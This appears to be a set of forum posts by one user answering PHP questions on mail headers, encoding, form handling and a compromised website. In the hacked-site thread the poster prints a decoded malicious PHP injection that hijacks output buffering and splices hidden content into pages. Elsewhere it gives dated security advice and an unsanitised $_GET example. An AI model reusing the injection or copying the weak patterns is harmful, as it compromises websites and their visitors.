oni-kun

Clients shouldn't parse HTML if it isn't defined to. Mailservers may flag your message as spam if you don't define the mail's MIME as HTML. $header .= 'MIME-Version: 1.0' . "\n"; $header .= 'Content-type: text/html; charset=UTF-8' . "\r\n"; This will allow the HTML to actually parse and the user to recieve the correct message you intended, Being nice to the client's mailserver.

ASCII is the default character set from binary, you need to simply encode it in unicode, try this example: <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> </head> <body> <?php define('HEX2BIN_WS', " \t\n\r"); function hex2bin($hex_string) { $pos = 0; $result = ''; while ($pos < strlen($hex_string)) { if (strpos(HEX2BIN_WS, $hex_string{$pos}) !== FALSE) { $pos++; } else { $code = hexdec(substr($hex_string, $pos, 2)); $pos = $pos + 2; $result .= chr($code); } } return utf8_encode($result); } echo hex2bin('6472e6626572'); ?> </body </html> And it should return it correctly. If it doesn't, than add the header from serverside..

Yes, If you want to filter client code (Not dealing serverside protection) Than you should apply those methods. Another reasonable method is strip_tags which will strip ALL html tags such as <script> etc without the need to nullify them.

Try this: It'll retain the codepoints: <?php define('HEX2BIN_WS', " \t\n\r"); function hex2bin($hex_string) { $pos = 0; $result = ''; while ($pos < strlen($hex_string)) { if (strpos(HEX2BIN_WS, $hex_string{$pos}) !== FALSE) { $pos++; } else { $code = hexdec(substr($hex_string, $pos, 2)); $pos = $pos + 2; $result .= chr($code); } } return $result; } echo hex2bin('6472e6626572'); //Returns 'dræber' ?>

I want to be upgraded! Give me a bigger.. harddrive

Well, as long as you have mysql_real_escape_string being performed on all entries and POST's you're fairly safe. Remember the golden rule, Never trust user input.

I try this: <html> <?php if (isset($_POST['submit'])) { $test = base64_encode($_POST['test']); $test = base64_decode($test); echo "Test without nl2br(): " . $test . "<br />"; echo "Test with nl2br(): " . nl2br($test) . "<br />"; } ?> <form method="post" action=""> <textarea name="test"></textarea> <br /><input type="submit" name="submit" value="submit!" /> </form> </html> And it works and retains the newline, yeah, I was suspecting they were invisible or something of the sort. Glad it can be transported.

So if I retrieve $_POST['textareacontents'] , It will retain \n's? I'm not sure how to do this.. I want it like "string\nline2\nbla bla \nbla", and when I unencode the string, I can apply nl2br, but I don't know if the \n's even exist or whatever

I'm creating a simple encoding program, and what I want it to do is retain the newlines, as echoing a textarea for example will strip them out (I think). How do I retain the \n's or whatnot and place them into a single string along with the text? will it be too much trouble? I just want it simple so I can nl2br() it in the end. I don't know what html/PHP does when it POSTS's data from a textarea.

There are some threads with somewhat helpful info here.. http://forums.oscommerce.com/index.php?showtopic=344262 http://forums.oscommerce.com/topic/344272-did-someone-hack-my-site-eval-base64-decode/ But yeah, from the look of it, and the nature of php being open source, you're messed without a backup or a lot of time..

rand - And yes, It's more a convenience for the people helping you, when you help yourself. i did look on google what am i supposed to search? random generator php well go try it. it's all random thanks tho. The VERY first result I get when I search up "random generator php" gives me: http://php.net/manual/en/function.rand.php

rand - And yes, It's more a convenience for the people helping you, when you help yourself.

Why are you using CURL for a samedomain POST? It makes no sense. And yes, since PHP is serverside it needs to refresh before it displays something in a text box, if that is what you were asking. I'd recommend you use something other than CURL for this.

Use htmlentities

Maybe upload and show me a full page, such as your index. Maybe something was changed, I could spot it if it's in the .php file itself. If it isn't, than php.ini or so may have been modified.

You may want to delete the folder named '2' on your root. This may be an entry the person has created to get back into your site or something.

What is the code for your query? You should check if all the entries are filled before you ever insert it into your database. Use mysql_real_escape_string on all fields entering into your database to sanitize your input, and enter: or die('Warning: MySQL has performed an error: ' . mysql_error()); On the same line of your mysql_query().. But it'd be useful to see your code..

I just need to know, is your hosting username 'socrime' or similar? But yes, if you did not create that than you should delete it , from the looks of it, it's hiding the directories of domain.com/2/..

Uh oh.. Are there any other files on your server such as .htaccess that have entries you did not include? SOMETHING may have been further modified to prevent you from removing their code, look in your php file that doesn't work without it for example, is that the only thing changed? I'd look online with some of that code.. You can re-decode the base64 here if you wish http://www.motobit.com/util/base64-decoder-encoder.asp?charset=iso-8859-1&acharset= There may be an entry somewhere online describing the type of attack and how to remove it.

Indeed it does. Serverside basically parses it , and serves it to you. Meaning you cannot view it until it is served. AJAX shouldn't be too hard for a simple project that you're using, you can write the backend in PHP and use AJAX to call php. For example AJAX could call 'getpage.php?id=2' and return all the variables you need etc.

Wow, Man that must suck.. I'd recommend using some sort of batch text replacer, shouldn't be too hard to FTP them off site and use one, I've found some online. If the codes are the same (should be) you can simply replace them all at one go. But yeah, change your passwords! Good luck.

It looks like it's attempting to replace your 'body' tags with some sort of chat? Or program of some sort. I believe it is a hacking attempt, as it has a stupidly simple obfuscation technique. Change your passwords, especially FTP/Your site account's. And remove it from every file you have. EDIT: Dragonfly looks like it's a CMS, do you use this? It may have been autogenerated if you're using some sort of content generator.. But i'm not sure why it would be encoded, I still think it's not supposed to be there.

You're entering the PHP code into a .html document, therefor the server will NOT parse it as PHP and give you that erroneous code. You will need to add the following to your .htaccess file to run PHP code within html: AddHandler application/x-httpd-php .php .html

It's base64, an almost sad form of obfuscation, but here's the decoded result: if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/socrime/public_html/t2/sandbox/backup-8.6.2008_20-15-20_socrime/homedir/public_html/phptesting/x7chat2/docs/install.dragonfly/x7chat/style.css.php')){include_once('/home/socrime/public_html/t2/sandbox/backup-8.6.2008_20-15-20_socrime/homedir/public_html/phptesting/x7chat2/docs/install.dragonfly/x7chat/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&{$h=strpos($d,chr(0),$h)+1;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/\<body/si',$c)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$c);}else{return gml().$c;}}ob_start('dgobh');}}} There's no lines since the base64 encoding stripped them. EDIT: 'socrime', is that your username? May be an XSS attack if it were appearing on your pages for no reason.. 'install.dragonfly', Not sure what dragonfly is.

Can't you just do.. image.php: <?php $file = $_GET['file']; echo "http://www.site1.com/images/". $file; ? It'll mask it if I'm right.